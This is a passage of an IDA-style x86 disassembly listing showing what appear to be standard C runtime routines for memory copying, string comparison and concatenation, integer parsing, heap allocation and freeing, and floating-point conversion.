mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_417A9C
rep movsd
jmp off_417B88[edx*4]
; ---------------------------------------------------------------------------
align 4
off_417B1C dd offset loc_417B7F ; DATA XREF: sub_417A40:loc_417A9C�r
dd offset loc_417B6C
dd offset loc_417B64
dd offset loc_417B5C
dd offset loc_417B54
dd offset loc_417B4C
dd offset loc_417B44
dd offset loc_417B3C
; ---------------------------------------------------------------------------
loc_417B3C: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_417B44: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_417B4C: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_417B54: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_417B5C: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_417B64: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_417B6C: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_417B7F: ; CODE XREF: sub_417A40:loc_417A9C�j
; DATA XREF: sub_417A40:off_417B1C�o
jmp off_417B88[edx*4]
; ---------------------------------------------------------------------------
align 4
off_417B88 dd offset loc_417B98 ; DATA XREF: sub_417A40+35�r
; sub_417A40+92�r ...
dd offset loc_417BA0
dd offset loc_417BAC
dd offset loc_417BC0
; ---------------------------------------------------------------------------
loc_417B98: ; CODE XREF: sub_417A40+35�j
; sub_417A40+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417BA0: ; CODE XREF: sub_417A40+35�j
; sub_417A40+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417BAC: ; CODE XREF: sub_417A40+35�j
; sub_417A40+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_417BC0: ; CODE XREF: sub_417A40+35�j
; sub_417A40+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417BD8: ; CODE XREF: sub_417A40+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_417C0C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_417C00
std
rep movsd
cld
jmp off_417D20[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417C00: ; CODE XREF: sub_417A40+1B1�j
; sub_417A40+208�j ...
neg ecx
jmp off_417CD0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_417C0C: ; CODE XREF: sub_417A40+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_417C24
and eax, 3
sub ecx, eax
jmp dword ptr loc_417C24+4[eax*4]
; ---------------------------------------------------------------------------
loc_417C24: ; CODE XREF: sub_417A40+1D6�j
; DATA XREF: sub_417A40+1DD�r
jmp off_417D20[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417C38
dd offset loc_417C58
dd offset loc_417C80
; ---------------------------------------------------------------------------
loc_417C38: ; DATA XREF: sub_417A40+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_417C00
std
rep movsd
cld
jmp off_417D20[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_417C58: ; DATA XREF: sub_417A40+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_417C00
std
rep movsd
cld
jmp off_417D20[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417C80: ; DATA XREF: sub_417A40+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_417C00
std
rep movsd
cld
jmp off_417D20[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417CD4
dd offset loc_417CDC
dd offset loc_417CE4
dd offset loc_417CEC
dd offset loc_417CF4
dd offset loc_417CFC
dd offset loc_417D04
off_417CD0 dd offset loc_417D17 ; DATA XREF: sub_417A40+1C2�r
; ---------------------------------------------------------------------------
loc_417CD4: ; DATA XREF: sub_417A40+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_417CDC: ; DATA XREF: sub_417A40+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_417CE4: ; DATA XREF: sub_417A40+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_417CEC: ; DATA XREF: sub_417A40+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_417CF4: ; DATA XREF: sub_417A40+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_417CFC: ; DATA XREF: sub_417A40+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_417D04: ; DATA XREF: sub_417A40+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_417D17: ; CODE XREF: sub_417A40+1C2�j
; DATA XREF: sub_417A40:off_417CD0�o
jmp off_417D20[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_417D20 dd offset loc_417D30 ; DATA XREF: sub_417A40+1B7�r
; sub_417A40:loc_417C24�r ...
dd offset loc_417D38
dd offset loc_417D48
dd offset loc_417D5C
; ---------------------------------------------------------------------------
loc_417D30: ; CODE XREF: sub_417A40+1B7�j
; sub_417A40:loc_417C24�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417D38: ; CODE XREF: sub_417A40+1B7�j
; sub_417A40:loc_417C24�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417D48: ; CODE XREF: sub_417A40+1B7�j
; sub_417A40:loc_417C24�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_417D5C: ; CODE XREF: sub_417A40+1B7�j
; sub_417A40:loc_417C24�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_417A40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417D80 proc near ; CODE XREF: sub_4010B2+FC�p
; sub_4010B2+118�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_417DCC
loc_417D90: ; CODE XREF: sub_417D80+3C�j
; sub_417D80+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_417DC4
or al, al
jz short loc_417DC0
cmp ah, [ecx+1]
jnz short loc_417DC4
or ah, ah
jz short loc_417DC0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_417DC4
or al, al
jz short loc_417DC0
cmp ah, [ecx+3]
jnz short loc_417DC4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_417D90
mov edi, edi
loc_417DC0: ; CODE XREF: sub_417D80+18�j
; sub_417D80+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_417DC4: ; CODE XREF: sub_417D80+14�j
; sub_417D80+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_417DCC: ; CODE XREF: sub_417D80+E�j
test edx, 1
jz short loc_417DE8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_417DC4
inc ecx
or al, al
jz short loc_417DC0
test edx, 2
jz short loc_417D90
loc_417DE8: ; CODE XREF: sub_417D80+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_417DC4
or al, al
jz short loc_417DC0
cmp ah, [ecx+1]
jnz short loc_417DC4
or ah, ah
jz short loc_417DC0
add ecx, 2
jmp short loc_417D90
sub_417D80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417E10 proc near ; CODE XREF: sub_4010B2+19E�p
; sub_401E07+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_417E29
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_417E29: ; CODE XREF: sub_417E10+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_417E10 endp
; =============== S U B R O U T I N E =======================================
sub_417E44 proc near ; CODE XREF: sub_417ECF+4�p
; sub_4210F5+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_417E4C: ; CODE XREF: sub_417E44+34�j
cmp cbMultiByte, 1
jle short loc_417E64
movzx eax, byte ptr [edi]
push 8 ; int
push eax ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_417E73
; ---------------------------------------------------------------------------
loc_417E64: ; CODE XREF: sub_417E44+F�j
movzx eax, byte ptr [edi]
mov ecx, dword_43DD30
mov al, [ecx+eax*2]
and eax, 8
loc_417E73: ; CODE XREF: sub_417E44+1E�j
test eax, eax
jz short loc_417E7A
inc edi
jmp short loc_417E4C
; ---------------------------------------------------------------------------
loc_417E7A: ; CODE XREF: sub_417E44+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_417E8A
cmp esi, 2Bh
jnz short loc_417E8E
loc_417E8A: ; CODE XREF: sub_417E44+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_417E8E: ; CODE XREF: sub_417E44+44�j
xor ebx, ebx
loc_417E90: ; CODE XREF: sub_417E44+7B�j
cmp cbMultiByte, 1
jle short loc_417EA5
push 4 ; int
push esi ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_417EB0
; ---------------------------------------------------------------------------
loc_417EA5: ; CODE XREF: sub_417E44+53�j
mov eax, dword_43DD30
mov al, [eax+esi*2]
and eax, 4
loc_417EB0: ; CODE XREF: sub_417E44+5F�j
test eax, eax
jz short loc_417EC1
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_417E90
; ---------------------------------------------------------------------------
loc_417EC1: ; CODE XREF: sub_417E44+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_417ECA
neg eax
loc_417ECA: ; CODE XREF: sub_417E44+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_417E44 endp
; =============== S U B R O U T I N E =======================================
sub_417ECF proc near ; CODE XREF: sub_4013E8+12�p
; sub_4013E8+1D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_417E44
pop ecx
retn
sub_417ECF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EDA proc near ; CODE XREF: sub_401444+3A1�p
; sub_402110+4F5�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_41A5BA
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_417F19
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_417F26
; ---------------------------------------------------------------------------
loc_417F19: ; CODE XREF: sub_417EDA+35�j
lea eax, [ebp+var_20]
push eax ; int
push 0 ; Buffer
call sub_41A4A5
pop ecx
pop ecx
loc_417F26: ; CODE XREF: sub_417EDA+3D�j
mov eax, esi
pop esi
leave
retn
sub_417EDA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417F30 proc near ; CODE XREF: sub_40182F+8�p
; sub_4019BB+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_417F50
loc_417F3C: ; CODE XREF: sub_417F30+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_417F3C
loc_417F50: ; CODE XREF: sub_417F30+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_417F30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417F60 proc near ; CODE XREF: sub_402110+2C3�p
; sub_402110+2E3�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_417FDA
mov dh, [ecx+1]
test dh, dh
jz short loc_417FC7
loc_417F78: ; CODE XREF: sub_417F60+52�j
; sub_417F60+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_417F9A
test al, al
jz short loc_417F94
loc_417F89: ; CODE XREF: sub_417F60+32�j
mov al, [esi]
inc esi
loc_417F8C: ; CODE XREF: sub_417F60+3F�j
cmp al, dl
jz short loc_417F9A
test al, al
jnz short loc_417F89
loc_417F94: ; CODE XREF: sub_417F60+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_417F9A: ; CODE XREF: sub_417F60+23�j
; sub_417F60+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_417F8C
lea edi, [esi-1]
loc_417FA4: ; CODE XREF: sub_417F60+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_417FD3
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_417F78
mov al, [ecx+3]
test al, al
jz short loc_417FD3
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_417FA4
jmp short loc_417F78
; ---------------------------------------------------------------------------
loc_417FC7: ; CODE XREF: sub_417F60+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_419696
; ---------------------------------------------------------------------------
loc_417FD3: ; CODE XREF: sub_417F60+49�j
; sub_417F60+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_417FDA: ; CODE XREF: sub_417F60+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_417F60 endp
; =============== S U B R O U T I N E =======================================
sub_417FE0 proc near ; CODE XREF: sub_406428+2AE�p
; sub_40B124+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_418051
sub_417FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417FF0 proc near ; CODE XREF: sub_402703+478�p
; sub_4069DA+15C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41800C
loc_417FFD: ; CODE XREF: sub_417FF0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41803F
test ecx, 3
jnz short loc_417FFD
loc_41800C: ; CODE XREF: sub_417FF0+B�j
; sub_417FF0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41800C
mov eax, [ecx-4]
test al, al
jz short loc_41804E
test ah, ah
jz short loc_418049
test eax, 0FF0000h
jz short loc_418044
test eax, 0FF000000h
jz short loc_41803F
jmp short loc_41800C
; ---------------------------------------------------------------------------
loc_41803F: ; CODE XREF: sub_417FF0+12�j
; sub_417FF0+4B�j
lea edi, [ecx-1]
jmp short loc_418051
; ---------------------------------------------------------------------------
loc_418044: ; CODE XREF: sub_417FF0+44�j
lea edi, [ecx-2]
jmp short loc_418051
; ---------------------------------------------------------------------------
loc_418049: ; CODE XREF: sub_417FF0+3D�j
lea edi, [ecx-3]
jmp short loc_418051
; ---------------------------------------------------------------------------
loc_41804E: ; CODE XREF: sub_417FF0+39�j
lea edi, [ecx-4]
loc_418051: ; CODE XREF: sub_417FE0+5�j
; sub_417FF0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_418076
loc_41805D: ; CODE XREF: sub_417FF0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4180C8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_41805D
jmp short loc_418076
; ---------------------------------------------------------------------------
loc_418071: ; CODE XREF: sub_417FF0+9E�j
; sub_417FF0+B8�j
mov [edi], edx
add edi, 4
loc_418076: ; CODE XREF: sub_417FF0+6B�j
; sub_417FF0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_418071
test dl, dl
jz short loc_4180C8
test dh, dh
jz short loc_4180BF
test edx, 0FF0000h
jz short loc_4180B2
test edx, 0FF000000h
jz short loc_4180AA
jmp short loc_418071
; ---------------------------------------------------------------------------
loc_4180AA: ; CODE XREF: sub_417FF0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4180B2: ; CODE XREF: sub_417FF0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4180BF: ; CODE XREF: sub_417FF0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4180C8: ; CODE XREF: sub_417FF0+72�j
; sub_417FF0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_417FF0 endp
; =============== S U B R O U T I N E =======================================
sub_4180D0 proc near ; CODE XREF: sub_402703+93�p
; sub_402703+A1�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4180F0
loc_4180DC: ; CODE XREF: sub_4180D0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_418123
test ecx, 3
jnz short loc_4180DC
add eax, 0
loc_4180F0: ; CODE XREF: sub_4180D0+A�j
; sub_4180D0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4180F0
mov eax, [ecx-4]
test al, al
jz short loc_418141
test ah, ah
jz short loc_418137
test eax, 0FF0000h
jz short loc_41812D
test eax, 0FF000000h
jz short loc_418123
jmp short loc_4180F0
; ---------------------------------------------------------------------------
loc_418123: ; CODE XREF: sub_4180D0+11�j
; sub_4180D0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41812D: ; CODE XREF: sub_4180D0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_418137: ; CODE XREF: sub_4180D0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_418141: ; CODE XREF: sub_4180D0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4180D0 endp
; =============== S U B R O U T I N E =======================================
sub_41814B proc near ; CODE XREF: sub_4035F5+7A�p
; sub_4035F5+8A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_41815F
loc_418157: ; CODE XREF: sub_41814B+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_418157
loc_41815F: ; CODE XREF: sub_41814B+A�j
mov edx, [esp+arg_4]
push esi
loc_418164: ; CODE XREF: sub_41814B+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_418164
pop esi
retn
sub_41814B endp
; =============== S U B R O U T I N E =======================================
sub_418175 proc near ; CODE XREF: sub_40378E+21D�p
; .text:00403A9C�p ...
arg_0 = dword ptr 4
push dword ptr byte_445EDC+0D443Ch
push [esp+4+arg_0]
call sub_418187
pop ecx
pop ecx
retn
sub_418175 endp
; =============== S U B R O U T I N E =======================================
sub_418187 proc near ; CODE XREF: sub_418175+A�p
; sub_418BE5+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_4181B0
loc_41818E: ; CODE XREF: sub_418187+27�j
push [esp+arg_0]
call sub_4181B3
test eax, eax
pop ecx
jnz short locret_4181B2
cmp [esp+arg_4], eax
jz short locret_4181B2
push [esp+arg_0]
call sub_41AE39
test eax, eax
pop ecx
jnz short loc_41818E
loc_4181B0: ; CODE XREF: sub_418187+5�j
xor eax, eax
locret_4181B2: ; CODE XREF: sub_418187+13�j
; sub_418187+19�j
retn
sub_418187 endp
; =============== S U B R O U T I N E =======================================
sub_4181B3 proc near ; CODE XREF: sub_418187+B�p
arg_0 = dword ptr 4
mov eax, dword ptr byte_445EDC+0D5A48h
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_4181D7
cmp esi, dword ptr byte_445EDC+0D5A40h
ja short loc_418209
push esi
call sub_41B3C2
test eax, eax
pop ecx
jz short loc_418209
pop esi
retn
; ---------------------------------------------------------------------------
loc_4181D7: ; CODE XREF: sub_4181B3+D�j
cmp eax, 2
jnz short loc_418209
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_4181EC
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_4181EF
; ---------------------------------------------------------------------------
loc_4181EC: ; CODE XREF: sub_4181B3+2F�j
push 10h
pop esi
loc_4181EF: ; CODE XREF: sub_4181B3+37�j
cmp esi, dword_43FF74
ja short loc_418216
mov eax, esi
shr eax, 4
push eax
call sub_41BE65
test eax, eax
pop ecx
jnz short loc_418225
jmp short loc_418216
; ---------------------------------------------------------------------------
loc_418209: ; CODE XREF: sub_4181B3+15�j
; sub_4181B3+20�j ...
test esi, esi
jnz short loc_418210
push 1
pop esi
loc_418210: ; CODE XREF: sub_4181B3+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_418216: ; CODE XREF: sub_4181B3+42�j
; sub_4181B3+54�j
push esi ; dwBytes
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapAlloc
loc_418225: ; CODE XREF: sub_4181B3+52�j
pop esi
retn
sub_4181B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418227(LPVOID lpMem)
sub_418227 proc near ; CODE XREF: .text:00403AE9�p
; .text:00403AF1�p ...
var_4 = dword ptr -4
lpMem = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+lpMem]
test esi, esi
jz short loc_41828D
mov eax, dword ptr byte_445EDC+0D5A48h
cmp eax, 3
jnz short loc_418253
push esi
call sub_41B06E
pop ecx
test eax, eax
push esi
jz short loc_41827F
push eax
call sub_41B099
pop ecx
pop ecx
jmp short loc_41828D
; ---------------------------------------------------------------------------
loc_418253: ; CODE XREF: sub_418227+14�j
cmp eax, 2
jnz short loc_41827E
lea eax, [ebp+lpMem]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_41BDC9
add esp, 0Ch
test eax, eax
jz short loc_41827E
push eax
push [ebp+lpMem]
push [ebp+var_4]
call sub_41BE20
add esp, 0Ch
jmp short loc_41828D
; ---------------------------------------------------------------------------
loc_41827E: ; CODE XREF: sub_418227+2F�j
; sub_418227+44�j
push esi ; lpMem
loc_41827F: ; CODE XREF: sub_418227+20�j
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapFree
loc_41828D: ; CODE XREF: sub_418227+A�j
; sub_418227+2A�j ...
pop esi
leave
retn
sub_418227 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418290(double)
sub_418290 proc near ; CODE XREF: sub_404B54+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword ptr unk_43DCF0
call sub_41CA62
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_418316
call sub_41C92A
pop ecx
test eax, eax
pop ecx
jle short loc_4182F9
cmp eax, 2
jle short loc_4182EB
cmp eax, 3
jnz short loc_4182F9
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_41C23A
add esp, 10h
jmp short loc_41835B
; ---------------------------------------------------------------------------
loc_4182EB: ; CODE XREF: sub_418290+3F�j
push esi
push ebx
call sub_41CA62
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_41835B
; ---------------------------------------------------------------------------
loc_4182F9: ; CODE XREF: sub_418290+3A�j
; sub_418290+44�j
fld [ebp+arg_0]
fadd dbl_424698
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_418353
; ---------------------------------------------------------------------------
loc_418316: ; CODE XREF: sub_418290+2F�j
call sub_41C8EF
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_418339
loc_41832B: ; CODE XREF: sub_418290+AC�j
push esi
push ebx
call sub_41CA62
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_41835B
; ---------------------------------------------------------------------------
loc_418339: ; CODE XREF: sub_418290+99�j
test bl, 20h
jnz short loc_41832B
fld [ebp+var_8]
push ebx ; int
push ecx ; int
push ecx ; int
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx ; int
push ecx ; int
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; dwExceptionCode
loc_418353: ; CODE XREF: sub_418290+84�j
call sub_41C28D
add esp, 1Ch
loc_41835B: ; CODE XREF: sub_418290+59�j
; sub_418290+67�j ...
pop esi
pop ebx
leave
retn
sub_418290 endp
; ---------------------------------------------------------------------------
call sub_418377
call sub_41CB2B
mov dword ptr byte_445EDC+0D43C4h, eax
call sub_41CADB
fnclex
retn
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_418377 proc near ; CODE XREF: .text:0041835F�p
mov eax, offset sub_41CF19
mov dword_440094, offset loc_41CBAE
mov dword_440090, eax
mov dword_440098, offset sub_41CC14
mov dword_44009C, offset sub_41CB54
mov dword_4400A0, offset loc_41CBFC
mov dword_4400A4, eax
retn
sub_418377 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4183B0 proc near ; CODE XREF: sub_404B54+1B�p
; sub_404B54+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_4183B0 endp
